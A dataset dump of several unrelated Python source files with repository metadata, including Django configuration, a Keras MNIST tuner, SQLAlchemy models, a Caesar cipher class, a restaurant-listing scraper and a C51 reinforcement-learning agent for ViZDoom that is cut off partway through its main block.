] | permissive | baifengbai/QA-CivilAviationKG | eb2a955eb1b4eed00a8bee85fb37f5c7ea2d34d7 | 616cb8bf7b381a53be9726fd4a463c55667677d0 | refs/heads/master | 2022-12-09T15:53:20.268370 | 2020-09-10T15:39:34 | 2020-09-10T15:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | # 问题的填充
import re
import Levenshtein
from lib.regexp import RangeYear, RefsYear
from lib.mapping import map_digits, map_refs
def year_complement(question: str) -> str:
""" 年份自动填充,转换各种表示为数字表示。
例:11年 -> 2011年
两千一十一年 -> 2011年
11-15年 -> 2011年,2012年,2013年,2014年,2015年
13到15年 -> 2013年,2014年,2015年
13年比前年 -> 2013年比2011年
15年比大大前年 -> 2015年比2011年
16年比3年前 -> 2016年比2013年
16年与前三年相比 -> 2016年与2015年,2014年,2013年相比
"""
complemented = question
    # First, fill in explicit year ranges
range_years = re.compile(RangeYear).findall(question)
last_year = ''
for (year, gap) in range_years:
year = year.strip('年')
if not gap:
new_year = map_digits(year)
else:
start, end = year.split(gap)
start_year, end_year = int(map_digits(start)), int(map_digits(end))
new_year = ','.join([str(start_year + i) for i in range(end_year - start_year + 1)])
last_year = new_year
complemented = complemented.replace(year, new_year)
    # Then fill in relative references ("the year before last", etc.)
for i, pattern in enumerate(RefsYear):
ref_years = re.compile(pattern).findall(complemented)
if ref_years:
year = ref_years[0][-1]
new_year = map_refs(year, i, int(last_year))
complemented = complemented.replace(year, new_year)
break
return complemented
def index_complement(question: str, words: list,
len_threshold: int = 4,
ratio_threshold: float = 0.5) -> tuple:
"""对问题中的指标名词进行模糊查询并迭代返回最接近的项.
:param question: 问题
:param words: 查询范围(词集)
:param len_threshold: 最小的有效匹配长度
:param ratio_threshold: 最小匹配率
:return: 首次匹配结果
"""
charset = set("".join(words))
pattern = re.compile(f'([{charset}]+)')
for result in pattern.findall(question):
if len(result) < len_threshold:
continue
scores = []
for word in words:
score = Levenshtein.ratio(word, result)
scores.append(score)
        # The candidate with the highest score is the closest match
max_score = max(scores)
if max_score >= ratio_threshold:
return words[scores.index(max_score)], result
return None, None
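# Illustrative usage based on the docstring examples above (assumes the
# patterns in lib.regexp and an indicator lexicon for the word list):
#
#     year_complement('11-15年的数据')
#     # -> '2011年,2012年,2013年,2014年,2015年的数据'
#     index_complement('货邮运输量如何', ['货邮运输量', '旅客运输量'])
#     # -> ('货邮运输量', '货邮运输量')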
| [
"[email protected]"
] | |
c89805f2b8005e92a1594b95d1049d78bddbe0f2 | 4254edac798c604dc59b5d586b52357b75d9e302 | /day7/alvdevops0505/alvdevops0505/urls.py | 242561d038498dd1c909378c56d28c8934155de5 | [] | no_license | casey-smile/P27M01 | 5531c3e5874e9308deebcd90eb6aaf1b91eb42eb | 8fd3255c7785f63d5bc1c81d9703674ffc5fdf39 | refs/heads/master | 2022-09-23T14:28:31.801166 | 2020-05-29T16:23:06 | 2020-05-29T16:23:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | """alvdevops0505 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
    path('', include('users.urls', namespace='users')),
path('accounts/', include('accounts.urls', namespace='accounts')),
]
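# With the namespaces above, views and templates can reverse URLs as e.g.
# reverse('users:index') or {% url 'accounts:login' %} (the url names are
# assumptions; they must match the names declared in each app's urls.py).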
| [
"[email protected]"
] | |
641513afa36e0a025b2386b2d085f86762f8831c | 414e0f17a1da288c5e7e7753eb51e44457480637 | /General/migrations/0002_auto_20190313_1534.py | 713c68f71c7cff04bfc69ae12424b2d9f7e74d5e | [] | no_license | livemonkey1300/ajax | ccb0103535c348cb2cf7190615bc1b696da6d469 | 429d1e6ebb32ef36cf320a9211b1430396e33576 | refs/heads/master | 2020-04-27T14:23:58.523709 | 2019-03-18T20:55:09 | 2019-03-18T20:55:09 | 174,408,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | # Generated by Django 2.1.5 on 2019-03-13 15:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('General', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='exchange',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='virtual_machine',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='voip',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
] | |
5438bf2918f6cb484ba4bfdaf5ceabf6e3a64e9b | e39f5ed824db24444580fabb42a06d8029d403ed | /machine_learning/class_03/lesson_01/mnist-search.py | 9be1204f3b77d45af7a43855106b3dad5f89bc30 | [] | no_license | tepkool01/uw_school | 4a027f10b1b7cd28ad2a64a224bdd0fbaa9c040c | 69490b53c0a1a1c7f4b318a988fe1b1e328e3163 | refs/heads/master | 2023-07-15T04:57:52.688896 | 2021-08-23T21:41:27 | 2021-08-23T21:41:27 | 303,208,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,492 | py | # pip install keras-tuner
import math
import numpy as np
from io import TextIOWrapper
from PIL import Image
from zipfile import ZipFile
trnX = np.zeros((60000, 28, 28), dtype = "float32")
trnY = np.zeros((60000), dtype = "int32")
tstX = np.zeros((10000, 28, 28), dtype = "float32")
with ZipFile("ml530-2021-sp-mnist.zip", "r") as archive:
index = 0
for i in range(trnX.shape[0]):
with archive.open("mnist_trn_images/mnist_trn_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
trnX[i] = np.asarray(img)
index = index + 1
with TextIOWrapper(archive.open("mnist_trn.csv", "r")) as file:
header = file.readline()
for i in range(trnY.shape[0]):
trnY[i] = np.int32(file.readline().strip("\r\n").split(",")[1])
index = 0
for i in range(tstX.shape[0]):
with archive.open("mnist_tst_images/mnist_tst_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
tstX[i] = np.asarray(img)
index = index + 1
trnX = trnX.reshape(trnX.shape[0], trnX.shape[1] * trnX.shape[2])
tstX = tstX.reshape(tstX.shape[0], tstX.shape[1] * tstX.shape[2])
trnX = trnX / 255
tstX = tstX / 255
from tensorflow import keras
from tensorflow.keras import callbacks, layers, optimizers
from kerastuner.tuners import RandomSearch, Hyperband, BayesianOptimization
class CustomTuner(Hyperband):
def run_trial(self, trial, *args, **kwargs):
batch_size = trial.hyperparameters.values["batch_size"]
kwargs["batch_size"] = batch_size
kwargs["steps_per_epoch"] = math.ceil(0.9 * trnX.shape[0] / batch_size)
super(CustomTuner, self).run_trial(trial, *args, **kwargs)
def build_model(hp):
depth = hp.Int("depth", min_value = 0, max_value = 4, step = 1)
width = hp.Choice("width", values = [ 64, 128, 256, 512 ])
activation = hp.Choice("activation", values = [ "linear", "relu", "sigmoid", "tanh" ])
dropout = hp.Float("dropout", 0, 0.5, step = 0.1)
optimizer = hp.Choice("optimizer", values = [ "adam", "rmsprop", "sgd" ])
learning_rate = hp.Choice("learning_rate", values = [ 0.01, 0.001, 0.0001 ])
batch_size = hp.Choice("batch_size", values = [ 512, 1024, 2048 ])
model = keras.Sequential()
    for _ in range(depth):  # avoid shadowing the sampled depth hyperparameter
model.add(layers.Dense(units = width, activation = activation))
model.add(layers.Dropout(dropout))
    # Map the sampled optimizer name to its class *before* overwriting the
    # string (the original assigned Adam first, so rmsprop/sgd never matched).
    if optimizer == "rmsprop":
        optimizer = optimizers.RMSprop
    elif optimizer == "sgd":
        optimizer = optimizers.SGD
    else:
        optimizer = optimizers.Adam
model.add(layers.Dense(trnY.max() + 1, activation = "softmax"))
model.compile(optimizer = optimizer(learning_rate = learning_rate), loss = "sparse_categorical_crossentropy", metrics = [ "accuracy" ])
return model
#tuner = RandomSearch(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# executions_per_trial = 1,
# directory = "tuning",
# project_name = "random")
#tuner = BayesianOptimization(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# num_initial_points = 8,
# directory = "tuning",
# project_name = "bayesian")
#tuner = Hyperband(build_model,
# objective = "val_accuracy",
# max_epochs = 32,
# hyperband_iterations = 1,
# directory = "tuning",
# project_name = "bandit")
tuner = CustomTuner(build_model,
objective = "val_accuracy",
max_epochs = 32,
hyperband_iterations = 1,
directory = "tuning",
project_name = "bandit")
callbacks = [ callbacks.ReduceLROnPlateau(monitor = "val_accuracy", patience = 2),
callbacks.EarlyStopping(monitor = "val_accuracy", patience = 8, restore_best_weights = True) ]
tuner.search_space_summary()
tuner.search(trnX, trnY, validation_split = 0.1, callbacks = callbacks)
tuner.results_summary()
model = tuner.get_best_models(num_models = 1)[0]
hyperparameters = tuner.get_best_hyperparameters(num_trials = 1)[0].get_config()
print(hyperparameters["values"])
probabilities = model.predict(tstX)
classes = probabilities.argmax(axis = -1)
predictions = open("predictions.csv", "w")
predictions.write("id,label\n")
for i in range(tstX.shape[0]):
predictions.write(str(i).zfill(5) + "," + str(classes[i]) + "\n")
predictions.close()
model.summary()
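# Possible follow-up (sketch): persist the tuned model for later scoring.
# The filename is arbitrary; Keras infers the HDF5 format from the extension.
# model.save("mnist_best_model.h5")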
| [
"[email protected]"
] | |
a31cb5f185c80ea397b6d84e1e2a1d488a88fd68 | a383c318c17b382bc3acad86b106584123ec5cd5 | /tifa/models/product_attr.py | fb9b11ea5d0303b510746f3e2d342138c1d3f67e | [
"MIT"
] | permissive | Jormungendr/tifa | 86f20aa8ca28548a5861c6dcd54ab12840aa0b0c | f703fd27f54000e7d51f06d2456d09cc79e0ab72 | refs/heads/master | 2023-07-13T08:21:26.464652 | 2021-08-24T14:19:52 | 2021-08-24T14:19:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,506 | py | import sqlalchemy as sa
from sqlalchemy.orm import relationship
from tifa.globals import Model
from tifa.models.attr import Attribute, AttributeValue
from tifa.models.product import ProductType, Product, ProductVariant
class AttributeProduct(Model):
__tablename__ = "attribute_product"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
attribute = relationship(Attribute)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
product_type = relationship(ProductType)
sort_order = sa.Column(sa.Integer, index=True)
class AssignedProductAttribute(Model):
__tablename__ = "assigned_product_attribute"
__table_args__ = (sa.UniqueConstraint("product_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
product_id = sa.Column(sa.ForeignKey("product.id"), nullable=False)
product = relationship(Product)
assignment_id = sa.Column(
sa.ForeignKey("attribute_product.id"),
nullable=False,
)
assignment = relationship(AttributeProduct)
class AssignedProductAttributeValue(Model):
__tablename__ = "assigned_product_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey("assigned_product_attribute.id"),
nullable=False,
)
assignment = relationship(AssignedProductAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
class AttributeVariant(Model):
__tablename__ = "attribute_variant"
__table_args__ = (sa.UniqueConstraint("attribute_id", "product_type_id"),)
id = sa.Column(sa.Integer, primary_key=True)
attribute_id = sa.Column(
sa.ForeignKey("attribute.id"),
nullable=False,
)
product_type_id = sa.Column(
sa.ForeignKey("product_type.id"),
nullable=False,
)
sort_order = sa.Column(sa.Integer, index=True)
attribute = relationship(Attribute)
product_type = relationship(ProductType)
class AssignedVariantAttribute(Model):
__tablename__ = "assigned_variant_attribute"
__table_args__ = (sa.UniqueConstraint("variant_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
variant_id = sa.Column(
sa.ForeignKey("product_variant.id"),
nullable=False,
)
assignment_id = sa.Column(
sa.ForeignKey("attribute_variant.id"),
nullable=False,
)
assignment = relationship(AttributeVariant)
variant = relationship(ProductVariant)
class AssignedVariantAttributeValue(Model):
__tablename__ = "assigned_variant_attribute_value"
__table_args__ = (sa.UniqueConstraint("value_id", "assignment_id"),)
id = sa.Column(sa.Integer, primary_key=True)
sort_order = sa.Column(sa.Integer, index=True)
assignment_id = sa.Column(
sa.ForeignKey(
"assigned_variant_attribute.id",
),
nullable=False,
)
assignment = relationship(AssignedVariantAttribute)
value_id = sa.Column(
sa.ForeignKey("attribute_value.id"),
nullable=False,
)
value = relationship(AttributeValue)
| [
"[email protected]"
] | |
6fa040ec27c8ff99da03fcd41b34c7abf7a93b67 | 391cbb86dc881e9de9bb3b9b0cc15b9199389acb | /python/modularizing/child.py | 94d2c4545ebfa134e03e63fbe19001bacf0d6d6e | [] | no_license | jgreen7773/python_stack | 3291498959de2d289f4b534e5e8643df03375f97 | 2948e467895c18c61f5c91b5c2b80455223a5d63 | refs/heads/master | 2020-07-15T18:12:06.227271 | 2019-09-26T22:37:01 | 2019-09-26T22:37:01 | 205,622,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | import parent
print(locals())
# If we import code from the sub-page to the main page, we don't want
# the code from there to be executed on our main page, so we use...
# something like this:
if __name__ == "__main__":
product = Product([args])
print(product)
print(product.add_tax(0.18)) | [
"[email protected]"
] | |
206aeb7d68e86e28ec22ef45eb51ed4f80dead0f | 3886c78ffed288379a54865ec6e494a514207d0d | /caravantone/view/artist.py | a2cc6e6f37388a036a88955d095390ea26d1f3ea | [] | no_license | Attsun1031/caravantone | 34a2a8b612af7bafc49b063f50953abe469d393b | bc5a9e481649e67f2c631aaf55384a4fce051ba7 | refs/heads/master | 2021-06-11T14:31:43.966237 | 2014-07-20T03:41:08 | 2014-07-20T03:41:08 | 18,760,513 | 0 | 0 | null | 2021-06-01T21:53:28 | 2014-04-14T12:55:19 | JavaScript | UTF-8 | Python | false | false | 1,161 | py | # -*- coding: utf-8 -*-
from flask import request, jsonify
from caravantone import app
from caravantone.view.util import require_login, jsonify_list
from caravantone.model.artist import Artist
from caravantone.es.artist_suggestion import suggest_artist
from caravantone.repository import artist_repository, user_repository
@app.route("/artists", methods=['POST'])
@require_login
def create(user):
"""create new artist data
:param user: current user
:return: Response
"""
artist = artist_repository.find_by_freebase_topic_id(request.form.get('freebase_topic_id'))
if not artist:
artist = Artist(name=request.form.get('name'), freebase_topic_id=request.form.get('freebase_topic_id'))
user.check_artists(artist)
user_repository.save(user)
return jsonify(name=artist.name)
@app.route("/artists/suggest", methods=['GET'])
@require_login
def suggest(user):
"""suggest artist name
:param user: current user
:return: Response
"""
name = request.args.get('name', '')
artists = suggest_artist(name)
return jsonify_list([{'name': artist.name, 'id': artist.artist_id} for artist in artists])
| [
"[email protected]"
] | |
d4703ba2bdb76a23ad5f3eef4f0eb86443e92219 | 93dd16432fcb4b42670f208edf81b2eb29f40d41 | /pycaesarcipher.py | 980eed0fa1ec667cce8da2834d93cf03891ce125 | [
"MIT"
] | permissive | shyams1993/pycaesarcipher | d067f4fda7acdb5f70687d5262a6fbc39d5e3790 | a396f165cc9a103950d060c94e25f7f344e7b257 | refs/heads/master | 2022-06-27T17:28:48.417994 | 2020-05-07T10:05:25 | 2020-05-07T10:05:25 | 261,873,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,180 | py | class pycaesarcipher():
'''
DOCSTRING: This class contains the encipher function & decipher function to one of the most simplest substitution Ciphers - "Caesar's Cipher"
'''
def __init__(self):
return None
def caesar_encipher(self,word,shiftkey):
'''
DOCSTRING: Function to encipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To encrypt, it uses the basic formula : (character + shiftkey)
\nOUTPUT: The Enciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_encipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then encipher to maintain uniformity.
'''
word = word.lower()
ciphertext = []
for w in range(len(word)):
x = (ord(word[w]) + shiftkey)
if x > 122:
y = (x-122)+96
ciphertext.append(chr(y))
elif ord(word[w]) == 32:
y = 32
ciphertext.append(chr(y))
else:
ciphertext.append(chr(x))
word = ''.join([str(s) for s in ciphertext])
return word
def caesar_decipher(self,word,shiftkey):
'''
DOCSTRING: Function to decipher a given string using caesar cipher.
\nINPUT: Any string and shiftkey.
\nLOGIC: To decipher, it uses the basic formula : (character - shiftkey)
\nOUTPUT: The deciphered string result.
\nUSAGE: First import the CaesarCipher package; Then, create an instance of the class by using a variable to assign & call an instance of the class.
\nSyntax: variable_name = CaesarCipher()
\nThen create another variable to call either the caesar_encipher() method or caesae_decipher() method using two positional arguments : target word/variable, shiftkey
\nSyntax: another_variable = variable_name.caesar_decipher("string",integer)
\n\nThis logic uses ASCII code representation to convert the strings to integers. You can use any string, but this method will convert the string to lowercase and then decipher to maintain uniformity.
'''
word = word.lower()
plaintext = []
for w in range(len(word)):
x = (ord(word[w]) - shiftkey)
if x>=70 and x < 97:
y = (x-96)+122
plaintext.append(chr(y))
elif ord(word[w]) == 32:
plaintext.append(chr(32))
else:
plaintext.append(chr(x))
word = ''.join([str(s) for s in plaintext])
return word | [
"[email protected]"
] | |
47cc53e4d489c658835626b31746754eba3a8c9b | 361270624816c78772e39efd5dc3269da19fd156 | /test.py | a14298a618e48218120391c19beb2ce733c295d8 | [] | no_license | Dairaku/Scraping | 4f14c741b8a16ca33393fcf146b34e7896b38ab4 | ab39f3542c1fc61148249faac31b5bcc59f76639 | refs/heads/master | 2020-05-27T14:29:10.364824 | 2019-05-26T08:51:38 | 2019-05-26T08:51:38 | 188,660,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,646 | py | #!/usr/bin/env python
# coding: utf-8
import csv
import requests
from urllib.request import urlopen
from bs4 import BeautifulSoup
import ssl
import re
import pandas as pd
import time
base_url = "https://tabelog.com/tokyo/A1304/A130401/rstLst/"
begin_page = 1
end_page = 10
#最終ページの計算用
r_base = requests.get(base_url)
soup_base = BeautifulSoup(r_base.content, 'html.parser')
page_num = begin_page
#csvリストの作成
csvlist = [["store_name", "score", "review_num", "url", "category_name", "reserve_tel", "prefecture", "district", "seat_num", "facebook", "restaurant_tel", "homepage", "open_date"]]
#CSVファイルを開く。ファイルがなければ新規作成する。
f = open("output.csv", "w", encoding="utf_8_sig")
writecsv = csv.writer(f, lineterminator='\n')
while True:
list_url = base_url + str(page_num) + "/"
print(list_url)
# 一覧ページで、ページネーション順に取得
r1 = requests.get(list_url)
soup1 = BeautifulSoup(r1.content, 'lxml')
soup_a_list = soup1.find_all('a', class_='list-rst__rst-name-target')
# 店の個別ページURLを取得
for soup_a in soup_a_list:
item_url = soup_a.get('href')
print(item_url)
r = requests.get(item_url)
soup = BeautifulSoup(r.content, 'lxml')
#点数
try:
score = soup.find("span", class_="rdheader-rating__score-val-dtl").get_text()
print(score)
except:
score="NULL"
pass
print(score)
# 口コミ数
try:
review_num = soup.find("em", class_="num").get_text()
except:
review_num="NULL"
pass
print(review_num)
#情報取得
info = str(soup)
#店舗名
try:
store_name = info.split('display-name')[1].split('<span>')[1].split('</span>')[0].strip()
except:
store_name="NULL"
pass
print(store_name)
#ジャンル名
try:
category_name = info.split('<th>ジャンル</th>')[1].split('<td>')[1].split('</td>')[0].split('<span>')[1].split('</span>')[0].strip()
except:
category_name="NULL"
pass
print(category_name)
#予約電話番号
try:
reserve_tel = info.split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
reserve_tel="NULL"
pass
print(reserve_tel)
#都道府県
try:
prefecture = info.split('<p class="rstinfo-table__address">')[1].split('/">')[1].split('</a>')[0].strip()
except:
prefecture="NULL"
pass
print(prefecture)
#区
try:
district = info.split('<p class="rstinfo-table__address">')[1].split('/rstLst/')[1].split('">')[1].split('</a>')[0].strip()
except:
district="NULL"
pass
print(district)
#席数
try:
seat_num = info.split('<th>席数</th>')[1].split('<td>')[1].split('</td>')[0].split('<p>')[1].split('席</p>')[0].strip()
except:
seat_num="NULL"
pass
print(seat_num)
#公式アカウント facebook
try:
facebook = info.split('rstinfo-sns-link rstinfo-sns-facebook')[1].split('<span>')[1].split('</span>')[0].strip()
except:
facebook="NULL"
pass
print(facebook)
#電話番号
try:
restaurant_tel = info.split('<th>電話番号</th>')[1].split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
restaurant_tel="NULL"
pass
print(restaurant_tel)
#ホームページ
try:
homepage = info.split('<th>ホームページ</th>')[1].split('<span>')[1].split('</span>')[0].strip()
except:
homepage="NULL"
pass
print(homepage)
#オープン日
try:
open_date = info.split('rstinfo-opened-date">')[1].split('</p>')[0].strip()
except:
open_date="NULL"
pass
print(open_date)
#csvリストに順に追加
csvlist.append([store_name, score, review_num, item_url, category_name, reserve_tel, prefecture, district, seat_num, facebook, restaurant_tel, homepage, open_date])
if page_num >= end_page:
print(csvlist)
break
page_num += 1
# 出力
writecsv.writerows(csvlist)
# CSVファイルを閉じる
f.close()
| [
"[email protected]"
] | |
140b356fa408e4eb413cb2c100895ff01e14c112 | 264cbdc7c2b4091179ba5fbdbb15005f6ac58b9f | /Algos/C51/examples/python/c51_ddqn.py | bb6455d9b4ae5b306ac48462cd633e024bd33c62 | [] | no_license | geeko66/PA2018-2019-KA | e25b49dd71ad4b5b2f3a00624147a9b24151c3d8 | 186d127608c8ea754a6e64836b0347d32cf37da6 | refs/heads/master | 2020-04-15T21:46:42.503444 | 2019-01-16T11:12:12 | 2019-01-16T11:12:12 | 165,046,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,185 | py | #!/usr/bin/env python
from __future__ import print_function
import skimage as skimage
from skimage import transform, color, exposure
from skimage.viewer import ImageViewer
import random
from random import choice
import numpy as np
from collections import deque
import time
import math
import pickle
import json
from keras.models import model_from_json
from keras.models import Sequential, load_model, Model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, Dense, Flatten, merge, MaxPooling2D, Input, AveragePooling2D, Lambda, Merge, Activation, Embedding
from keras.optimizers import SGD, Adam, rmsprop
from keras import backend as K
from keras.utils import np_utils
from vizdoom import DoomGame, ScreenResolution
from vizdoom import *
import itertools as it
from time import sleep
import tensorflow as tf
from networks import Networks
import sys
# Not needed for the bonseyes's project
def preprocessImg(img, size):
img = np.rollaxis(img, 0, 3) # It becomes (640, 480, 3)
img = skimage.transform.resize(img,size)
img = skimage.color.rgb2gray(img)
return img
class C51Agent:
def __init__(self, state_size, action_size, num_atoms):
# get size of state and action
self.state_size = state_size
self.action_size = action_size
        # these are the hyperparameters for the DQN
self.gamma = 0.99
self.learning_rate = 0.0001
self.epsilon = 1.0
self.initial_epsilon = 1.0
self.final_epsilon = 0.0001
self.batch_size = 32
self.observe = 2000
self.explore = 50000
self.frame_per_action = 4
self.update_target_freq = 3000
self.timestep_per_train = 100 # Number of timesteps between training interval
# Initialize Atoms
self.num_atoms = num_atoms # 51 for C51
self.v_max = 30 # Max possible score for Defend the center is 26 - 0.1*26 = 23.4
self.v_min = -10 # -0.1*26 - 1 = -3.6
self.delta_z = (self.v_max - self.v_min) / float(self.num_atoms - 1)
self.z = [self.v_min + i * self.delta_z for i in range(self.num_atoms)]
# Create replay memory using deque
self.memory = deque()
self.max_memory = 50000 # number of previous transitions to remember
# Models for value distribution
self.model = None
self.target_model = None
# Performance Statistics
self.stats_window_size= 50 # window size for computing rolling statistics
self.mavg_score = [] # Moving Average of Survival Time
self.var_score = [] # Variance of Survival Time
self.mavg_ammo_left = [] # Moving Average of Ammo used
self.mavg_kill_counts = [] # Moving Average of Kill Counts
def update_target_model(self):
"""
After some time interval update the target model to be same with model
"""
self.target_model.set_weights(self.model.get_weights())
def get_action(self, state):
"""
Get action from model using epsilon-greedy policy
"""
if np.random.rand() <= self.epsilon:
#print("----------Random Action----------")
action_idx = random.randrange(self.action_size)
else:
action_idx = self.get_optimal_action(state)
return action_idx
def get_optimal_action(self, state):
"""Get optimal action for a state
"""
z = self.model.predict(state) # Return a list [1x51, 1x51, 1x51]
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1)
# Pick action with the biggest Q value
action_idx = np.argmax(q)
return action_idx
def shape_reward(self, r_t, misc, prev_misc, t):
"""
Reward design:
        Will be the inverted time in Bonseyes (x = -x) because
        time is the quantity we want to minimize, therefore we
        maximize the inverted time
"""
# Check any kill count
if misc[0] > prev_misc[0]:
r_t = r_t + 1
if misc[1] < prev_misc[1]: # Use ammo
r_t = r_t - 0.1
if misc[2] < prev_misc[2]: # Loss HEALTH
r_t = r_t - 0.1
return r_t
# save sample <s,a,r,s'> to the replay memory
def replay_memory(self, s_t, action_idx, r_t, s_t1, is_terminated, t):
"""
Used for the replay experience
"""
self.memory.append((s_t, action_idx, r_t, s_t1, is_terminated))
if self.epsilon > self.final_epsilon and t > self.observe:
self.epsilon -= (self.initial_epsilon - self.final_epsilon) / self.explore
if len(self.memory) > self.max_memory:
self.memory.popleft()
# Update the target model to be same with model
if t % self.update_target_freq == 0:
self.update_target_model()
# pick samples randomly from replay memory (with batch_size)
def train_replay(self):
"""
        Note: consider updating this method to use prioritized experience
        replay, following the companion implementation. TODO.
"""
num_samples = min(self.batch_size * self.timestep_per_train, len(self.memory))
replay_samples = random.sample(self.memory, num_samples)
state_inputs = np.zeros(((num_samples,) + self.state_size))
next_states = np.zeros(((num_samples,) + self.state_size))
m_prob = [np.zeros((num_samples, self.num_atoms)) for i in range(action_size)]
action, reward, done = [], [], []
for i in range(num_samples):
state_inputs[i,:,:,:] = replay_samples[i][0]
action.append(replay_samples[i][1])
reward.append(replay_samples[i][2])
next_states[i,:,:,:] = replay_samples[i][3]
done.append(replay_samples[i][4])
z = self.model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
z_ = self.target_model.predict(next_states) # Return a list [32x51, 32x51, 32x51]
# Get Optimal Actions for the next states (from distribution z)
optimal_action_idxs = []
z_concat = np.vstack(z)
q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) # length (num_atoms x num_actions)
q = q.reshape((num_samples, action_size), order='F')
optimal_action_idxs = np.argmax(q, axis=1)
# Project Next State Value Distribution (of optimal action) to Current State
for i in range(num_samples):
if done[i]: # Terminal State
# Distribution collapses to a single point
Tz = min(self.v_max, max(self.v_min, reward[i]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += (m_u - bj)
m_prob[action[i]][i][int(m_u)] += (bj - m_l)
else:
for j in range(self.num_atoms):
Tz = min(self.v_max, max(self.v_min, reward[i] + self.gamma * self.z[j]))
bj = (Tz - self.v_min) / self.delta_z
m_l, m_u = math.floor(bj), math.ceil(bj)
m_prob[action[i]][i][int(m_l)] += z_[optimal_action_idxs[i]][i][j] * (m_u - bj)
m_prob[action[i]][i][int(m_u)] += z_[optimal_action_idxs[i]][i][j] * (bj - m_l)
loss = self.model.fit(state_inputs, m_prob, batch_size=self.batch_size, epochs=1, verbose=0)
return loss.history['loss']
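    # Worked example of the projection above (illustrative numbers): with
    # v_min=-10, v_max=30 and 51 atoms, delta_z = 40/50 = 0.8. A terminal
    # sample with reward 3 gives Tz=3 and bj=(3+10)/0.8=16.25, so probability
    # mass 0.75 goes to atom 16 and 0.25 to atom 17.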
# load the saved model
def load_model(self, name):
self.model.load_weights(name)
# save the model which is under training
def save_model(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
print("System path")
print(sys.path)
    # Keep TensorFlow from eating up all the GPU memory
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
K.set_session(sess)
game = DoomGame()
# game.load_config("..\..\scenarios\defend_the_center.cfg")
game.load_config("/Users/tesla/Downloads/ViZDoom-master/scenarios/defend_the_center.cfg")
game.set_sound_enabled(True)
game.set_screen_resolution(ScreenResolution.RES_640X480)
game.set_window_visible(False)
game.set_mode(Mode.PLAYER)
game.init()
game.new_episode("./episode_rec/ep1.lmp")
game_state = game.get_state()
misc = game_state.game_variables # [KILLCOUNT, AMMO, HEALTH]
prev_misc = misc
action_size = game.get_available_buttons_size()
img_rows , img_cols = 64, 64
# Convert image into Black and white
img_channels = 4 # We stack 4 frames
# C51
num_atoms = 51
state_size = (img_rows, img_cols, img_channels)
agent = C51Agent(state_size, action_size, num_atoms)
agent.model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
agent.target_model = Networks.value_distribution_network(state_size, num_atoms, action_size, agent.learning_rate)
x_t = game_state.screen_buffer # 480 x 640
x_t = preprocessImg(x_t, size=(img_rows, img_cols))
s_t = np.stack(([x_t]*4), axis=2) # It becomes 64x64x4
s_t = np.expand_dims(s_t, axis=0) # 1x64x64x4
is_terminated = game.is_episode_finished()
# Start training
epsilon = agent.initial_epsilon
GAME = 0
t = 0
